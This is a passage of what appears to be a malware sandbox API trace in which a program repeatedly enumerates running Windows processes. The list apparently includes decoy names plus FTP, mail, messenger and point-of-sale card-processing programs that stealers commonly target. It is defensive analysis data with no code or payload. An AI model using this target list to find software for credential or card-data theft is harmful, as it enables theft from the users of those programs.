cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0260.267] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0260.269] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0260.271] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0260.273] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0260.274] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0260.280] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0260.281] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0260.283] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0260.285] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0260.287] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0260.288] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0260.290] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0260.365] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0260.367] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0260.369] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0260.370] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0260.372] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0260.373] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0260.374] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0260.376] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0260.377] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0260.379] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0260.380] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0260.382] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0260.384] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0260.386] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0260.391] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0260.392] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0260.394] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0260.396] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0260.397] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0260.399] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0260.435] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0260.438] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0260.439] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0260.441] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0260.443] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0260.444] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0260.446] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0260.451] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0260.453] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0260.455] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0260.456] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0260.458] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0260.459] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0260.461] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0260.462] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0260.467] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0260.468] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0260.470] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0260.471] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0260.473] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0260.474] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0260.476] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0260.477] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0260.478] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0260.500] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0260.501] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0260.503] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0260.504] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0260.506] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0260.507] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0260.509] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0260.514] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0260.516] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0260.517] CloseHandle (hObject=0x1d14) returned 1 [0260.518] Sleep (dwMilliseconds=0x64) [0260.637] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0260.649] Process32First (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.650] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0260.655] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0260.656] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0260.658] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0260.659] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0260.661] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0260.662] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0260.664] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0260.665] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.667] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.671] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0260.673] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.674] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.676] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.677] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.678] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.680] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 